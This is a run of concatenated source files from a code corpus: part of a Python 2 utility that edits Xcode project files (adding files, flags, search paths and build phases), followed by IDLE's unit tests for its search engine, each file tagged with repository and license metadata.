if root_id: self.root_object = self.objects[root_id] root_group_id = self.root_object.get('mainGroup') self.root_group = self.objects[root_group_id] else: print "error: project has no root object" self.root_object = None self.root_group = None for k, v in self.objects.iteritems(): v.id = k def add_other_cflags(self, flags): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.add_other_cflags(flags): self.modified = True def add_other_ldflags(self, flags): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.add_other_ldflags(flags): self.modified = True def remove_other_ldflags(self, flags): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.remove_other_ldflags(flags): self.modified = True def add_header_search_paths(self, paths, recursive=True): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.add_header_search_paths(paths, recursive): self.modified = True def add_framework_search_paths(self, paths, recursive=True): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.add_framework_search_paths(paths, recursive): self.modified = True def add_library_search_paths(self, paths, recursive=True): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] for b in build_configs: if b.add_library_search_paths(paths, recursive): self.modified = True def add_flags(self, pairs, configuration='All'): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] # iterate over all the pairs of configurations for b in build_configs: if configuration != "All" and b.get('name') != configuration : continue for k in pairs: if b.add_flag(k, pairs[k]): self.modified = True 
def remove_flags(self, pairs, configuration='All'): build_configs = [b for b in self.objects.values() if b.get('isa') == 'XCBuildConfiguration'] # iterate over all the pairs of configurations for b in build_configs: if configuration != "All" and b.get('name') != configuration : continue for k in pairs: if b.remove_flag(k, pairs[k]): self.modified = True def get_obj(self, id): return self.objects.get(id) def get_ids(self): return self.objects.keys() def get_files_by_os_path(self, os_path, tree='SOURCE_ROOT'): files = [f for f in self.objects.values() if f.get('isa') == 'PBXFileReference' and f.get('path') == os_path and f.get('sourceTree') == tree] return files def get_files_by_name(self, name, parent=None): if parent: files = [f for f in self.objects.values() if f.get('isa') == 'PBXFileReference' and f.get('name') == name and parent.has_child(f)] else: files = [f for f in self.objects.values() if f.get('isa') == 'PBXFileReference' and f.get('name') == name] return files def get_build_files(self, id): files = [f for f in self.objects.values() if f.get('isa') == 'PBXBuildFile' and f.get('fileRef') == id] return files def get_groups_by_name(self, name, parent=None): if parent: groups = [g for g in self.objects.values() if g.get('isa') == 'PBXGroup' and g.get_name() == name and parent.has_child(g)] else: groups = [g for g in self.objects.values() if g.get('isa') == 'PBXGroup' and g.get_name() == name] return groups def get_or_create_group(self, name, path=None, parent=None): if not name: return None if not parent: parent = self.root_group elif not isinstance(parent, PBXGroup): # assume it's an id parent = self.objects.get(parent, self.root_group) groups = self.get_groups_by_name(name) for grp in groups: if parent.has_child(grp.id): return grp grp = PBXGroup.Create(name, path) parent.add_child(grp) self.objects[grp.id] = grp self.modified = True return grp def get_groups_by_os_path(self, path): path = os.path.abspath(path) groups = [g for g in self.objects.values() if 
g.get('isa') == 'PBXGroup' and os.path.abspath(g.get('path', '/dev/null')) == path] return groups def get_build_phases(self, phase_name): phases = [p for p in self.objects.values() if p.get('isa') == phase_name] return phases def get_relative_path(self, os_path): return os.path.relpath(os_path, self.source_root) def verify_files(self, file_list, parent=None): # returns list of files not in the current project. if not file_list: return [] if parent: exists_list = [f.get('name') for f in self.objects.values() if f.get('isa') == 'PBXFileReference' and f.get('name') in file_list and parent.has_child(f)] else: exists_list = [f.get('name') for f in self.objects.values() if f.get('isa') == 'PBXFileReference' and f.get('name') in file_list] return set(file_list).difference(exists_list) def add_run_script(self, target, script=None): result = [] targets = [t for t in self.get_build_phases('PBXNativeTarget') + self.get_build_phases('PBXAggregateTarget') if t.get('name') == target] if len(targets) != 0 : script_phase = PBXShellScriptBuildPhase.Create(script) for t in targets: skip = False for buildPhase in t['buildPhases']: if self.objects[buildPhase].get('isa') == 'PBXShellScriptBuildPhase' and self.objects[buildPhase].get('shellScript') == script: skip = True if not skip: t['buildPhases'].add(script_phase.id) self.objects[script_phase.id] = script_phase result.append(script_phase) return result def add_run_script_all_targets(self, script=None): result = [] targets = self.get_build_phases('PBXNativeTarget') + self.get_build_phases('PBXAggregateTarget') if len(targets) != 0 : script_phase = PBXShellScriptBuildPhase.Create(script) for t in targets: skip = False for buildPhase in t['buildPhases']: if self.objects[buildPhase].get('isa') == 'PBXShellScriptBuildPhase' and self.objects[buildPhase].get('shellScript') == script: skip = True if not skip: t['buildPhases'].add(script_phase.id) self.objects[script_phase.id] = script_phase result.append(script_phase) return result def 
add_folder(self, os_path, parent=None, excludes=None, recursive=True, create_build_files=True): if not os.path.isdir(os_path): return [] if not excludes: excludes = [] results = [] if not parent: parent = self.root_group elif not isinstance(parent, PBXGroup): # assume it's an id parent = self.objects.get(parent, self.root_group) path_dict = {os.path.split(os_path)[0]: parent} special_list = [] for (grp_path, subdirs, files) in os.walk(os_path): parent_folder, folder_name = os.path.split(grp_path) parent = path_dict.get(parent_folder, parent) if [sp for sp in special_list if parent_folder.startswith(sp)]: continue if folder_name.startswith('.'): special_list.append(grp_path) continue if os.path.splitext(grp_path)[1] in XcodeProject.special_folders: # if this file has a special extension (bundle or framework mainly) treat it as a file special_list.append(grp_path) new_files = self.verify_files([folder_name], parent=parent) # Ignore this file if it is in excludes if new_files and not [m for m in excludes if re.match(m, grp_path)]: results.extend(self.add_file(grp_path, parent, create_build_files=create_build_files)) continue # create group grp = self.get_or_create_group(folder_name, path=self.get_relative_path(grp_path), parent=parent) path_dict[grp_path] = grp results.append(grp) file_dict = {} for f in files: if f[0] == '.' 
or [m for m in excludes if re.match(m, f)]: continue kwds = { 'create_build_files': create_build_files, 'parent': grp, 'name': f } f_path = os.path.join(grp_path, f) file_dict[f_path] = kwds new_files = self.verify_files([n.get('name') for n in file_dict.values()], parent=grp) add_files = [(k, v) for k, v in file_dict.items() if v.get('name') in new_files] for path, kwds in add_files: kwds.pop('name', None) self.add_file(path, **kwds) if not recursive: break for r in results: self.objects[r.id] = r return results def path_leaf(self, path): head, tail = ntpath.split(path) return tail or ntpath.basename(head) def add_file_if_doesnt_exist(self, f_path, parent=None, tree='SOURCE_ROOT', create_build_files=True, weak=False, ignore_unknown_type=False): for obj in self.objects.values(): if 'path' in obj: if self.path_leaf(f_path) == self.path_leaf(obj.get('path')): return [] return self.add_file(f_path, parent, tree, create_build_files, weak, ignore_unknown_type=ignore_unknown_type) def my_add_file_reference(self, f_path, parent=None, tree='SOURCE_ROOT', create_build_files=True, weak=False, ignore_unknown_type=False): results = [] abs_path = '' if os.path.isabs(f_path): abs_path = f_path if not os.path.exists(f_path): return results elif tree == 'SOURCE_ROOT': f_path = os.path.relpath(f_path, self.source_root) else: tree = '<absolute>' if not parent: parent = self.root_group elif not isinstance(parent, PBXGroup): # assume it's an id parent = self.objects.get(parent, self.root_group) file_ref = PBXFileReference.Create(f_path, tree, ignore_unknown_type=ignore_unknown_type) parent.add_child(file_ref) results.append(file_ref) self.objects[file_ref.id] = file_ref build_file = PBXBuildFile.Create(file_ref, weak=weak) results.append(build_file) self.objects[build_file.id] = build_file self.modified = True return (file_ref, build_file) def add_file(self, f_path, parent=None, tree='SOURCE_ROOT', create_build_files=True, weak=False, ignore_unknown_type=False): results = [] abs_path 
= '' if os.path.isabs(f_path): abs_path = f_path if not os.path.exists(f_path): return results elif tree == 'SOURCE_ROOT': f_path = os.path.relpath(f_path, self.source_root) else: tree = '<absolute>' if not parent: parent = self.root_group elif not isinstance(parent, PBXGroup): # assume it's an id parent = self.objects.get(parent, self.root_group) file_ref = PBXFileReference.Create(f_path, tree, ignore_unknown_type=ignore_unknown_type) parent.add_child(file_ref) results.append(file_ref) # create a build file for the file ref if file_ref.build_phase and create_build_files: phases = self.get_build_phases(file_ref.build_phase) for phase in phases: build_file = PBXBuildFile.Create(file_ref, weak=weak) phase.add_build_file(build_file) results.append(build_file) if abs_path and tree == 'SOURCE_ROOT' \ and os.path.isfile(abs_path) \ and file_ref.build_phase == 'PBXFrameworksBuildPhase': library_path = os.path.join('$(SRCROOT)', os.path.split(f_path)[0]) self.add_library_search_paths([library_path], recursive=False) if abs_path and tree == 'SOURCE_ROOT' \ and not os.path.isfile(abs_path) \ and file_ref.build_phase == 'PBXFrameworksBuildPhase': framework_path = os.path.join('$(SRCROOT)', os.path.split(f_path)[0]) self.add_framework_search_paths([framework_path, '$(inherited)'], recursive=False) for r in results: self.objects[r.id] = r if results: self.modified = True return results def check_and_repair_framework(self, base): name = os.path.basename(base) if ".framework" in name: basename = name[:-len(".framework")] finalHeaders = os.path.join(base, "Headers") finalCurrent = os.path.join(base, "Versions/Current") finalLib = os.path.join(base, basename) srcHeaders = "Versions/A/Headers" srcCurrent = "A" srcLib = "Versions/A/" + basename if not os.path.exists(finalHeaders): os.symlink(srcHeaders, finalHeaders) if not os.path.exists(finalCurrent): os.symlink(srcCurrent, finalCurrent) if not os.path.exists(finalLib): os.symlink(srcLib, finalLib) def remove_file(self, id, 
recursive=True): if not PBXType.IsGuid(id): id = id.id if id in self.objects: self.objects.remove(id) # Remove from PBXResourcesBuildPhase and PBXSourcesBuildPhase if necessary buildFiles = [f for f in self.objects.values() if f.get('isa') == 'PBXBuildFile'] for buildFile in buildFiles: if id == buildFile.get('fileRef'): key = buildFile.id PBXRBP = [f for f in self.objects.values() if f.get('isa') == 'PBXResourcesBuildPhase'] PBXSBP = [f for f in self.objects.values() if f.get('isa') == 'PBXSourcesBuildPhase'] self.objects.remove(key) if PBXSBP[0].has_build_file(key): PBXSBP[0].remove_build_file(key) if PBXRBP[0].has_build_file(key): PBXRBP[0].remove_build_file(key) if recursive: groups = [g for g in self.objects.values() if g.get('isa') == 'PBXGroup'] for group in groups: if id in group['children']: group.remove_child(id) self.modified = True def remove_group(self, id, recursive = False): if not PBXType.IsGuid(id): id = id.id name = self.objects.get(id).get('path') children = self.objects.get(id).get('children') if name is None: name = id if id in self.objects: if recursive: for childKey in children: childValue = self.objects.get(childKey) if childValue.get('isa') == 'PBXGroup': self.remove_group(childKey, True) else: self.remove_file(childKey, False) else: return else: return self.objects.remove(id); def remove_group_by_name(self, name, recursive = False): groups = self.get_groups_by_name(name) if len(groups): for group in groups: self.remove_group(group, recursive) else: return def move_file(self, id, dest_grp=None): pass def apply_patch(self, patch_path, xcode_path): if not os.path.isfile(patch_path) or not os.path.isdir(xcode_path): print 'ERROR: couldn\'t apply "%s" to "%s"' % (patch_path, xcode_path) return print 'applying "%s" to "%s"' % (patch_path, xcode_path) return subprocess.call(['patch', '-p1', '--forward', '--directory=%s' % xcode_path, '--input=%s' % patch_path]) def apply_mods(self, mod_dict, default_path=None): if not default_path: default_path = 
os.getcwd() keys = mod_dict.keys() for k in keys: v = mod_dict.pop(k) mod_dict[k.lower()] = v parent = mod_dict.pop('group', None) if parent: parent = self.get_or_create_group(parent) excludes = mod_dict.pop('excludes', []) if excludes: excludes = [re.compile(e) for e in excludes] compiler_flags = mod_dict.pop('compiler_flags', {}) for k, v in mod_dict.items(): if k == 'patches': for p in v: if not os.path.isabs(p): p = os.path.join(default_path, p) self.apply_patch(p, self.source_root) elif k == 'folders': # get and compile excludes list # do each folder individually for folder in v: kwds = {} # if path contains ':' remove it and set recursive to False if ':' in folder: args = folder.split(':') kwds['recursive'] = False folder = args.pop(0) if os.path.isabs(folder) and os.path.isdir(folder): pass else: folder = os.path.join(default_path, folder) if not os.path.isdir(folder): continue if parent: kwds['parent'] = parent if excludes: kwds['excludes'] = excludes self.add_folder(folder, **kwds) elif k == 'headerpaths' or k == 'librarypaths': paths = [] for p in v: if p.endswith('/**'): p = os.path.split(p)[0] if not os.path.isabs(p): p = os.path.join(default_path, p) if not os.path.exists(p): continue p = self.get_relative_path(p) paths.append(os.path.join('$(SRCROOT)', p, "**")) if k == 'headerpaths': self.add_header_search_paths(paths) else: self.add_library_search_paths(paths) elif k == 'other_cflags': self.add_other_cflags(v) elif k == 'other_ldflags': self.add_other_ldflags(v) elif k == 'libs' or k == 'frameworks' or k == 'files': paths = {} for p in v: kwds = {} if ':' in p: args = p.split(':') p = args.pop(0) if 'weak' in args: kwds['weak'] = True file_path = os.path.join(default_path, p) search_path, file_name = os.path.split(file_path) if [m for m in excludes if re.match(m, file_name)]: continue try: expr = re.compile(file_name) except re.error: expr = None if expr and os.path.isdir(search_path): file_list = os.listdir(search_path) for f in file_list: if [m 
for m in excludes if re.match(m, f)]: continue if re.search(expr, f): kwds['name'] = f paths[os.path.join(search_path, f)] = kwds p = None if k == 'libs': kwds['parent'] = self.get_or_create_group('Libraries', parent=parent) elif k == 'frameworks': kwds['parent'] = self.get_or_create_group('Frameworks', parent=parent) if p: kwds['name'] = file_name if k == 'libs': p = os.path.join('usr', 'lib', p) kwds['tree'] = 'SDKROOT' elif k == 'frameworks': p = os.path.join('System', 'Library', 'Frameworks', p) kwds['tree'] = 'SDKROOT' elif k == 'files' and not os.path.exists(file_path): # don't add non-existent files to the project. continue paths[p] = kwds new_files = self.verify_files([n.get('name') for n in paths.values()]) add_files = [(k, v) for k, v in paths.items() if v.get('name') in new_files] for path, kwds in add_files: kwds.pop('name', None) if 'parent' not in kwds and parent: kwds['parent'] = parent self.add_file(path, **kwds) if compiler_flags: for k, v in compiler_flags.items(): filerefs = [] for f in v: filerefs.extend([fr.id for fr in self.objects.values() if fr.get('isa') == 'PBXFileReference' and fr.get('name') == f]) buildfiles = [bf for bf in self.objects.values() if bf.get('isa') == 'PBXBuildFile' and bf.get('fileRef') in filerefs] for bf in buildfiles: if bf.add_compiler_flag(k): self.modified = True def backup(self, file_name=None, backup_name=None): if not file_name: file_name = self.pbxproj_path if not backup_name: backup_name = "%s.%s.backup" % (file_name, datetime.datetime.now().strftime('%d%m%y-%H%M%S')) shutil.copy2(file_name, backup_name) return backup_name def save(self, file_name=None, old_format=False): if old_format : self.saveFormatXML(file_name) else: self.saveFormat3_2(file_name) def saveFormat3_2(self, file_name=None): """Alias for backward compatibility""" self.save_new_format(file_name) def save_format_xml(self, file_name=None): """Saves in old (xml) format""" if not file_name: file_name = self.pbxproj_path # This code is adapted from 
plistlib.writePlist with open(file_name, "w") as f: writer = PBXWriter(f) writer.writeln("<plist version=\"1.0\">") writer.writeValue(self.data) writer.writeln("</plist>") def save_new_format(self, file_name=None): """Save in Xcode 3.2 compatible (new) format""" if not file_name: file_name = self.pbxproj_path # process to get the section's info and names objs = self.data.get('objects') sections = dict() uuids = dict() for key in objs: l = list() if objs.get(key).get('isa') in sections: l = sections.get(objs.get(key).get('isa')) l.append(tuple([key, objs.get(key)])) sections[objs.get(key).get('isa')] = l if 'name' in objs.get(key): uuids[key] = objs.get(key).get('name') elif 'path' in objs.get(key): uuids[key] = objs.get(key).get('path') else: if objs.get(key).get('isa') == 'PBXProject': uuids[objs.get(key).get('buildConfigurationList')] = 'Build configuration list for PBXProject "Unity-iPhone"' elif objs.get(key).get('isa')[0:3] == 'PBX': uuids[key] = objs.get(key).get('isa')[3:-10] else: uuids[key] = 'Build configuration list for PBXNativeTarget "TARGET_NAME"' ro = self.data.get('rootObject') uuids[ro] = 'Project Object' for key in objs: # transitive references (used in the BuildFile section) if 'fileRef' in objs.get(key) and objs.get(key).get('fileRef') in uuids: uuids[key] = uuids[objs.get(key).get('fileRef')] # transitive reference to the target name (used in the Native target section) if objs.get(key).get('isa') == 'PBXNativeTarget': uuids[objs.get(key).get('buildConfigurationList')] = uuids[objs.get(key).get('buildConfigurationList')].replace('TARGET_NAME', uuids[key]) self.uuids = uuids self.sections = sections out = open(file_name, 'w') out.write('// !$*UTF8*$!\n') self._printNewXCodeFormat(out, self.data, '', enters=True) out.close() @classmethod def addslashes(cls, s): d = {'"': '\\"', "'": "\\'", "\0": "\\\0", "\\": "\\\\", "\n":"\\n"} return ''.join(d.get(c, c) for c in s) def _printNewXCodeFormat(self, out, root, deep, enters=True): if isinstance(root, 
IterableUserDict): out.write('{') if enters: out.write('\n') isa = root.pop('isa', '') if isa != '': # keep the isa in the first spot if enters: out.write('\t' + deep) out.write('isa = ') self._printNewXCodeFormat(out, isa, '\t' + deep, enters=enters) out.write(';') if enters: out.write('\n') else: out.write(' ') for key in sorted(root.iterkeys()): # keep the same order as Apple. if enters: out.write('\t' + deep) if re.match(regex, key).group(0) == key: out.write(key.encode("utf-8") + ' = ') else: out.write('"' + key.encode("utf-8") + '" = ') if key == 'objects': out.write('{') # open the objects section if enters: out.write('\n') #root.remove('objects') # remove it to avoid problems sections = [ ('PBXBuildFile', False), ('PBXCopyFilesBuildPhase', True), ('PBXFileReference', False), ('PBXFrameworksBuildPhase', True), ('PBXGroup', True), ('PBXAggregateTarget', True), ('PBXNativeTarget', True), ('PBXProject', True), ('PBXResourcesBuildPhase', True), ('PBXShellScriptBuildPhase', True), ('PBXSourcesBuildPhase', True), ('XCBuildConfiguration', True), ('XCConfigurationList', True), ('PBXTargetDependency', True), ('PBXVariantGroup', True), ('PBXReferenceProxy', True), ('PBXContainerItemProxy', True), ('XCVersionGroup', True)] for section in sections: # iterate over the sections if self.sections.get(section[0]) is None: continue out.write('\n/* Begin %s section */' % section[0].encode("utf-8")) self.sections.get(section[0]).sort(cmp=lambda x, y: cmp(x[0], y[0])) for pair in self.sections.get(section[0]): key = pair[0] value = pair[1] out.write('\n') if enters: out.write('\t\t' + deep) out.write(key.encode("utf-8")) if key in self.uuids: out.write(" /* " + self.uuids[key].encode("utf-8") + " */") out.write(" = ") self._printNewXCodeFormat(out, value, '\t\t' + deep, enters=section[1]) out.write(';') out.write('\n/* End %s section */\n' % section[0].encode("utf-8")) out.write(deep + '\t}') # close of the objects section else: self._printNewXCodeFormat(out, root[key], '\t' + 
deep, enters=enters) out.write(';') if enters: out.write('\n') else: out.write(' ') root['isa'] = isa # restore the isa for further calls if enters: out.write(deep) out.write('}') elif isinstance(root, UserList): out.write('(') if enters: out.write('\n') for value in root: if enters: out.write('\t' + deep) self._printNewXCodeFormat(out, value, '\t' + deep, enters=enters) out.write(',') if enters: out.write('\n') if enters: out.write(deep) out.write(')') else: if len(root) > 0 and re.match(regex, root).group(0) == root: out.write(root.encode("utf-8")) else: out.write('"' + XcodeProject.addslashes(root.encode("utf-8")) + '"') if root in self.uuids: out.write(" /* " + self.uuids[root].encode("utf-8") + " */") @classmethod def Load(cls, path): cls.plutil_path = os.path.join(os.path.split(__file__)[0], 'plutil') if not os.path.isfile(XcodeProject.plutil_path): cls.plutil_path = 'plutil' # load project by converting to xml and then convert that using plistlib p = subprocess.Popen([XcodeProject.plutil_path, '-convert', 'xml1', '-o', '-', path], stdout=subprocess.PIPE) stdout, stderr = p.communicate() # If the plist was malformed, returncode will be non-zero if p.returncode != 0: print stdout return None tree = plistlib.readPlistFromString(stdout) return XcodeProject(tree, path) @classmethod def LoadFromXML(cls, path): tree = plistlib.readPlist(path) return XcodeProject(tree, path) # The code below was adapted from plistlib.py. class PBXWriter(plistlib.PlistWriter): def writeValue(self, value): if isinstance(value, (PBXList, PBXDict)): plistlib.PlistWriter.writeValue(self, value.data) else: plistlib.PlistWriter.writeValue(self, value) def simpleElement(self, element, value=None): """ We have to override this method to deal with Unicode text correctly. Non-ascii characters have to get encoded as character references. 
""" if value is not None: value = _escapeAndEncode(value) self.writeln("<%s>%s</%s>" % (element, value, element)) else: self.writeln("<%s/>" % element) # Regex to find any control chars, except for \t \n and \r _controlCharPat = re.compile( r"[\x00\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0e\x0f" r"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f]") def _escapeAndEncode(text): m = _controlCharPat.search(text) if m is not None: raise ValueError("strings can't contains control characters; " "use plistlib.Data instead") text = text.replace("\r\n", "\n") # convert DOS line endings text = text.replace("\r", "\n") # convert Mac line endings text = text.replace("&", "&amp;") # escape '&' text = text.replace("<", "&lt;") # escape '<' text = text.replace(">", "&gt;") # escape '>' return text.encode("ascii", "xmlcharrefreplace") # encode as ascii with xml character references def main(): import json import argparse import subprocess import shutil import os parser = argparse.ArgumentParser("Modify an xcode project file using a single command at a time.") parser.add_argument('project', help="Project path") parser.add_argument('configuration', help="Modify the flags of the given configuration", choices=['Debug', 'Release', 'All']) parser.add_argument('-af', help='Add a flag value, in the format key=value', action='append') parser.add_argument('-rf', help='Remove a flag value, in the format key=value', action='append') parser.add_argument('-b', '--backup', help='Create a temporary backup before modify', action='store_true') args = parser.parse_args(); # open the project file if os.path.isdir(args.project) : args.project = args.project + "/project.pbxproj" if not os.path.isfile(args.project) : raise Exception("Project File not found") project = XcodeProject.Load(args.project) backup_file = None if args.backup : backup_file = project.backup() # apply the commands # add flags if args.af : pairs = {} for flag in args.af: tokens = flag.split("=") pairs[tokens[0]] = 
tokens[1] project.add_flags(pairs, args.configuration) # remove flags if args.rf : pairs = {} for flag in args.rf: tokens = flag.split("=") pairs[tokens[0]] = tokens[1] project.remove_flags(pairs, args.configuration) # save the file project.save() # remove backup if everything was ok. if args.backup : os.remove(backup_file) if __name__ == "__main__": main()
mpl-2.0
NEricN/RobotCSimulator
Python/App/Lib/idlelib/idle_test/test_searchengine.py
23
11486
'''Test functions and SearchEngine class in SearchEngine.py.''' # With mock replacements, the module does not use any gui widgets. # The use of tk.Text is avoided (for now, until mock Text is improved) # by patching instances with an index function returning what is needed. # This works because mock Text.get does not use .index. import re import unittest from test.test_support import requires from Tkinter import BooleanVar, StringVar, TclError # ,Tk, Text import tkMessageBox from idlelib import SearchEngine as se from idlelib.idle_test.mock_tk import Var, Mbox from idlelib.idle_test.mock_tk import Text as mockText def setUpModule(): # Replace s-e module tkinter imports other than non-gui TclError. se.BooleanVar = Var se.StringVar = Var se.tkMessageBox = Mbox def tearDownModule(): # Restore 'just in case', though other tests should also replace. se.BooleanVar = BooleanVar se.StringVar = StringVar se.tkMessageBox = tkMessageBox class Mock: def __init__(self, *args, **kwargs): pass class GetTest(unittest.TestCase): # SearchEngine.get returns singleton created & saved on first call. def test_get(self): saved_Engine = se.SearchEngine se.SearchEngine = Mock # monkey-patch class try: root = Mock() engine = se.get(root) self.assertIsInstance(engine, se.SearchEngine) self.assertIs(root._searchengine, engine) self.assertIs(se.get(root), engine) finally: se.SearchEngine = saved_Engine # restore class to module class GetLineColTest(unittest.TestCase): # Test simple text-independent helper function def test_get_line_col(self): self.assertEqual(se.get_line_col('1.0'), (1, 0)) self.assertEqual(se.get_line_col('1.11'), (1, 11)) self.assertRaises(ValueError, se.get_line_col, ('1.0 lineend')) self.assertRaises(ValueError, se.get_line_col, ('end')) class GetSelectionTest(unittest.TestCase): # Test text-dependent helper function. ## # Need gui for text.index('sel.first/sel.last/insert'). 
## @classmethod ## def setUpClass(cls): ## requires('gui') ## cls.root = Tk() ## ## @classmethod ## def tearDownClass(cls): ## cls.root.destroy() ## del cls.root def test_get_selection(self): # text = Text(master=self.root) text = mockText() text.insert('1.0', 'Hello World!') # fix text.index result when called in get_selection def sel(s): # select entire text, cursor irrelevant if s == 'sel.first': return '1.0' if s == 'sel.last': return '1.12' raise TclError text.index = sel # replaces .tag_add('sel', '1.0, '1.12') self.assertEqual(se.get_selection(text), ('1.0', '1.12')) def mark(s): # no selection, cursor after 'Hello' if s == 'insert': return '1.5' raise TclError text.index = mark # replaces .mark_set('insert', '1.5') self.assertEqual(se.get_selection(text), ('1.5', '1.5')) class ReverseSearchTest(unittest.TestCase): # Test helper function that searches backwards within a line. def test_search_reverse(self): Equal = self.assertEqual line = "Here is an 'is' test text." prog = re.compile('is') Equal(se.search_reverse(prog, line, len(line)).span(), (12, 14)) Equal(se.search_reverse(prog, line, 14).span(), (12, 14)) Equal(se.search_reverse(prog, line, 13).span(), (5, 7)) Equal(se.search_reverse(prog, line, 7).span(), (5, 7)) Equal(se.search_reverse(prog, line, 6), None) class SearchEngineTest(unittest.TestCase): # Test class methods that do not use Text widget. def setUp(self): self.engine = se.SearchEngine(root=None) # Engine.root is only used to create error message boxes. # The mock replacement ignores the root argument. 
def test_is_get(self): engine = self.engine Equal = self.assertEqual Equal(engine.getpat(), '') engine.setpat('hello') Equal(engine.getpat(), 'hello') Equal(engine.isre(), False) engine.revar.set(1) Equal(engine.isre(), True) Equal(engine.iscase(), False) engine.casevar.set(1) Equal(engine.iscase(), True) Equal(engine.isword(), False) engine.wordvar.set(1) Equal(engine.isword(), True) Equal(engine.iswrap(), True) engine.wrapvar.set(0) Equal(engine.iswrap(), False) Equal(engine.isback(), False) engine.backvar.set(1) Equal(engine.isback(), True) def test_setcookedpat(self): engine = self.engine engine.setcookedpat('\s') self.assertEqual(engine.getpat(), '\s') engine.revar.set(1) engine.setcookedpat('\s') self.assertEqual(engine.getpat(), r'\\s') def test_getcookedpat(self): engine = self.engine Equal = self.assertEqual Equal(engine.getcookedpat(), '') engine.setpat('hello') Equal(engine.getcookedpat(), 'hello') engine.wordvar.set(True) Equal(engine.getcookedpat(), r'\bhello\b') engine.wordvar.set(False) engine.setpat('\s') Equal(engine.getcookedpat(), r'\\s') engine.revar.set(True) Equal(engine.getcookedpat(), '\s') def test_getprog(self): engine = self.engine Equal = self.assertEqual engine.setpat('Hello') temppat = engine.getprog() Equal(temppat.pattern, re.compile('Hello', re.IGNORECASE).pattern) engine.casevar.set(1) temppat = engine.getprog() Equal(temppat.pattern, re.compile('Hello').pattern, 0) engine.setpat('') Equal(engine.getprog(), None) engine.setpat('+') engine.revar.set(1) Equal(engine.getprog(), None) self.assertEqual(Mbox.showerror.message, 'Error: nothing to repeat\nPattern: +') def test_report_error(self): showerror = Mbox.showerror Equal = self.assertEqual pat = '[a-z' msg = 'unexpected end of regular expression' Equal(self.engine.report_error(pat, msg), None) Equal(showerror.title, 'Regular expression error') expected_message = ("Error: " + msg + "\nPattern: [a-z") Equal(showerror.message, expected_message) Equal(self.engine.report_error(pat, msg, 
5), None) Equal(showerror.title, 'Regular expression error') expected_message += "\nOffset: 5" Equal(showerror.message, expected_message) class SearchTest(unittest.TestCase): # Test that search_text makes right call to right method. @classmethod def setUpClass(cls): ## requires('gui') ## cls.root = Tk() ## cls.text = Text(master=cls.root) cls.text = mockText() test_text = ( 'First line\n' 'Line with target\n' 'Last line\n') cls.text.insert('1.0', test_text) cls.pat = re.compile('target') cls.engine = se.SearchEngine(None) cls.engine.search_forward = lambda *args: ('f', args) cls.engine.search_backward = lambda *args: ('b', args) ## @classmethod ## def tearDownClass(cls): ## cls.root.destroy() ## del cls.root def test_search(self): Equal = self.assertEqual engine = self.engine search = engine.search_text text = self.text pat = self.pat engine.patvar.set(None) #engine.revar.set(pat) Equal(search(text), None) def mark(s): # no selection, cursor after 'Hello' if s == 'insert': return '1.5' raise TclError text.index = mark Equal(search(text, pat), ('f', (text, pat, 1, 5, True, False))) engine.wrapvar.set(False) Equal(search(text, pat), ('f', (text, pat, 1, 5, False, False))) engine.wrapvar.set(True) engine.backvar.set(True) Equal(search(text, pat), ('b', (text, pat, 1, 5, True, False))) engine.backvar.set(False) def sel(s): if s == 'sel.first': return '2.10' if s == 'sel.last': return '2.16' raise TclError text.index = sel Equal(search(text, pat), ('f', (text, pat, 2, 16, True, False))) Equal(search(text, pat, True), ('f', (text, pat, 2, 10, True, True))) engine.backvar.set(True) Equal(search(text, pat), ('b', (text, pat, 2, 10, True, False))) Equal(search(text, pat, True), ('b', (text, pat, 2, 16, True, True))) class ForwardBackwardTest(unittest.TestCase): # Test that search_forward method finds the target. 
## @classmethod ## def tearDownClass(cls): ## cls.root.destroy() ## del cls.root @classmethod def setUpClass(cls): cls.engine = se.SearchEngine(None) ## requires('gui') ## cls.root = Tk() ## cls.text = Text(master=cls.root) cls.text = mockText() # search_backward calls index('end-1c') cls.text.index = lambda index: '4.0' test_text = ( 'First line\n' 'Line with target\n' 'Last line\n') cls.text.insert('1.0', test_text) cls.pat = re.compile('target') cls.res = (2, (10, 16)) # line, slice indexes of 'target' cls.failpat = re.compile('xyz') # not in text cls.emptypat = re.compile('\w*') # empty match possible def make_search(self, func): def search(pat, line, col, wrap, ok=0): res = func(self.text, pat, line, col, wrap, ok) # res is (line, matchobject) or None return (res[0], res[1].span()) if res else res return search def test_search_forward(self): # search for non-empty match Equal = self.assertEqual forward = self.make_search(self.engine.search_forward) pat = self.pat Equal(forward(pat, 1, 0, True), self.res) Equal(forward(pat, 3, 0, True), self.res) # wrap Equal(forward(pat, 3, 0, False), None) # no wrap Equal(forward(pat, 2, 10, False), self.res) Equal(forward(self.failpat, 1, 0, True), None) Equal(forward(self.emptypat, 2, 9, True, ok=True), (2, (9, 9))) #Equal(forward(self.emptypat, 2, 9, True), self.res) # While the initial empty match is correctly ignored, skipping # the rest of the line and returning (3, (0,4)) seems buggy - tjr. 
Equal(forward(self.emptypat, 2, 10, True), self.res) def test_search_backward(self): # search for non-empty match Equal = self.assertEqual backward = self.make_search(self.engine.search_backward) pat = self.pat Equal(backward(pat, 3, 5, True), self.res) Equal(backward(pat, 2, 0, True), self.res) # wrap Equal(backward(pat, 2, 0, False), None) # no wrap Equal(backward(pat, 2, 16, False), self.res) Equal(backward(self.failpat, 3, 9, True), None) Equal(backward(self.emptypat, 2, 10, True, ok=True), (2, (9,9))) # Accepted because 9 < 10, not because ok=True. # It is not clear that ok=True is useful going back - tjr Equal(backward(self.emptypat, 2, 9, True), (2, (5, 9))) if __name__ == '__main__': unittest.main(verbosity=2, exit=2)
apache-2.0
jhaynie/titanium_mobile
node_modules/node-gyp/gyp/pylib/gyp/xcode_emulation.py
1283
65086
